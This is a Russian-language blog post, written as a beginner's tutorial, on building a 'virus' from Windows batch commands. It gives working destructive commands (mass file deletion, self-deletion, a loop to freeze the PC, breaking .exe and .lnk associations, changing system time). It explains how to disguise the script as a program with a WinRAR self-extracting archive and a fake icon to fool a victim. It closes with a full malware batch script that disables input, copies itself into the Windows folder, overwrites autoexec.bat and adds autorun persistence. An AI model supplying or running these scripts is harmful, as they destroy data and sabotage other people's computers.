Четверг, 28.03.2024, 23:58

...

Меню сайта
Категории раздела
полезные секреты [9]
программы [20]
игры PC [6]
фильмы [14]
скрипты [1]
игры PSP [5]
Windows [1]
новости [3]
Мини-чат
200
Наш опрос
с какого файлообменника вы предпочитаете качать?
Всего ответов: 96
Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0
Вход на сайт
Логин:
Пароль:
Фильмы онлайн
Поиск
Календарь
«  Декабрь 2009  »
ПнВтСрЧтПтСбВс
 123456
78910111213
14151617181920
21222324252627
28293031
Архив записей
Друзья сайта

20:21
вирус собственными руками
Приветствую всех начинающих вирусописателей)) В этой статье не будет ничего сложного, здесь НЕ БУДЕТ ПРОГРАММИРОВАНИЯ. Зато очень полезная информация для тех кто хочет создать свой «вирус»)) …Ну ладно поехали!)



Вобщем речь пойдёт о написании вируса в блокноте с расширением .bat. 

BAT файлы это командные файлы в которых записаны команды по одной в каждой строчке. ТОесть написал команду в строчке блокнота жмёшь «Enter» и приступил к написанию другой) Теперь делай по действиям :

Запускаешь блокнот
Сейчас приведу парочку тупых команд но это для того чтобы ты убедился что я не врун)) Дальше будет интереснее) Вот пример того что можешь пихнуть в блокнот..
Calc (запускает конкулятор)

Taskmgr (диспетчер задач)

Mspaint(рисовалка)

Это привёл КОМАНДЫ!) Теперь смотри как это запускать….перед всеми этими командами пишешь «start» Пример: start mspaint, С этим разобрались. Теперь сохраняй всё это дело…Что уже сохранил? Теперь смотри если ты сохранил в формате «txt» то можешь смело искать другую тему и покинуть эту…если ты внимательно читал и сохранил в «bat» то можешь себя похвалить))) Теперь пробуй запустить твоё чудо) Если команда правильная то у тебя запуститься то что ты хотел)) Теперь следущее….

И ещё.. прописывать «start» только для прог винды!!! Для остальных команд этого не нужно!! Теперь…))))

А теперь мы приступим к злому банальному удалению файлов!! Запускай любимый блокнот и пиши в нём…(ты скопировал команду а ты сам напиши! Запоминай их!!)

del *.* /q ( после запуска этой команды все файлы кроме папок которые были в той папке где был запущен вирус удалатся!!! Тоесть ты уже сохранил это добро в bat на рабочий стол или в мои документы ну или куда хочешь…запускаешь это и……АААА!!!!! Меня Нае….и!!!! Нет) Если ярлычки на рабочем столе удалились а в моих документах кроме папок ничего не осталось значит всё нормально! (для тебя скорее всего и хорошо и плохо, читать нужно было что эта команда делает!))) Нужно просто быть ВНИМАТЕЛЬНЫМ!

Теперь ещё….

Если ты хочешь чтобы твой загадочный файлик после выполнения всех команд просто взял и исчез то эта команда для тебя) del %0 (ПИСАТЬ ЕЁ В САМОМ КОНЦЕ ВИРУСА)))) 

Эти команды копируют твой файлик туда куда ему скажешь) Вот типичный пример…

copy %0 C:\saper.bat или copy %0 C:\game.bat Имена файлов и буквы жёсткого диска можно менять главное чтобы они существовали)(всмысле разделы винчестера имелись а не имена файлов)

Теперь прикольнёмся) пиши эту команду) label E: pridurok .После выполнения этой команды винт будет называться «pridurok»))) Тупо но весело)

«Скажи сколько время?))» Вот ещё команда) time 00:00 . Время можно установить естественно своё ну например time 07:45 . Можно ещё подправить дату) date 13.03.36

ПРикольно получится) Каспер начнёт ругаться мол «ключик истёк ещё 20 лет назад))) Покупай или проваливай))))) Также и с другими прогами работающие подобным образом.) Вот тебе ещё команда которая при запуске попытается (в зависимости от мощности компа) повесить его.

:x ; 

Start mspaint

goto x ;

Вместо паинта можно поставить любые проги которые хочешь. Возьми тот же калькулятор или сапёр)) Теперь одна весёлая команда))) assoc .exe=.mp3 После её выполнения все ексешнкики будут запускаться как музыка)) Это явное убийство компа) Можно ещё почудить с ярлыками…например пишешь так.. assoc .lnk=.txt И тогда все ярлычки будут открываться скорее всего блокнотиком)))) Представляешь глаза юзверя который будет стучать мышкой по столу пытаясь запустить любимую контру с рабочего стола через ярлык)))) Можно ещё позабивать комп папками) Вот команда:

md 1

md 2

md 3

md 4…

Ну и так далее) А теперь ты говоришь мне « А если мне нужно 1000 папок что я буду всё прописывать вручную?» И я отвечаю «Нет» Есть прекрасный продукт от всеми нами любимого дядя Лешки. Называется он Microsoft Office . Там есть такой "Exel» Вот в первый ящичек пишешь md 1 и оттягиваешь эту колоночку вниз до нужного тебе числа. Ну потом копируешь и вставляешь в блокнотик….Скорость создания папок напрямую зависит от мощности компа. Кстати намёк…папки тоже место на винте занимают))))

Теперь давай подумаем…Будь твоя жертва немного опытным юзером он испугается рисунка на твоём файлике. (ещё бы! Такая шестерёнка на загадочном файлике..) А ещё хуже если он код посмотрит через тот же блокнотик)))) Надо это исправлять!!! Вкладки «сменить значок» не нашёл?) И правильно) Его и не будет))) Знаешь что мы будем использовать? Нет нет…не джойнер…Мы будем юзать WinRar!!! Что тут удивительного?)))) Просто всё нужно применять в своих целях)) Прежде чем читать дальше иди отдохни или попей пива/колы/сока и т.д….Ну всё теперь дальше…

Кидаешь свой вирусик в архив и теперь начинается самое интересное…вылетает окошко типа «имя и параметры архива» Там выбираешь степень сжатия и т.д…но нам не сжатие нужно….Просто ставишь галочку «Создать SFX-архив. Теперь у тебя не bat файл и не rar…а EXE!!! Теперь заходим в «Дополнительно» и тыкаем кнопку «Параметры SFX». Там есть строка «выолнить после распоковки» там пишешь РЕАЛЬНОЕ имя твоего вирусика с раиширением ну вот пример…virus.bat Теперь ищешь вкладку про лицензию и куралекаешь всякую фигню) Ну если лень можешь с какой-то буржуйской проги на китайском скопировать и вставить. И в вкладке «логотип или значок SFX» указываешь путь к какому-то значку…ну поищи в папке с играм там все значки обычно…ну впринципе всё…Подведём итоги…

Как ты видишь из ничего мы сделали подобие чего-то))) Безобидный блокнот выступил как вирусосоздаватель а винрар сделал якобы программу….Выводы делать конечно только тебе. И смотри не попадись сам на такое) Смотри по размеру файлов и вообще ничего загадочного лучше не принимай от людей в инете!!

ахх, ну да, чуть не забыл, вот все команды bat файлов))


@echo off
rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
rundll32 keyboard,disable //Было
rundll32 mouse,disable //Было
rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
echo Обновление параметров системы, пожалуйста подождите... //пишет отмазку :)
label mp_k //Меняем имя диску
copy mp_k.exe %windir% //Копирует себя в папку windows
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER...[]=[_H@CKED_BY_[kas]*_ «SmallPox_Vir_Org» _] > c:\autoexec.bat
echo run = %windir%\mp_k.exe >> %windir%\win.ini
echo run = %windir%\mp_k.exe >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе.
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject («WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup («Warning,... А теперь необходимо перезагрузиться»); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
attrib %windir%\mp_k.exe +h +s +a +r
attrib c:\autorun.inf +h +s +a +r
attrib d:\autorun.inf +h +s +a +r
deltree /y mp_k.exe
rmdir %windir%\temp //Удаляем папку temp
mkdir %windir%\temp //Создаем папку temp
cls


ВНИМАНИЕ!!! Администраторы сайта не несут ответственности за ваши поступки! Всё делаете на свой страх и риск!
Категория: полезные секреты | Просмотров: 817 | Добавил: admin-net1 | Теги: вирусы, как сделать свой вирус, вирус самому, Вирус с Помощью Простого Блокнота и, вирус | Рейтинг: 0.0/0
Всего комментариев: 0
Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]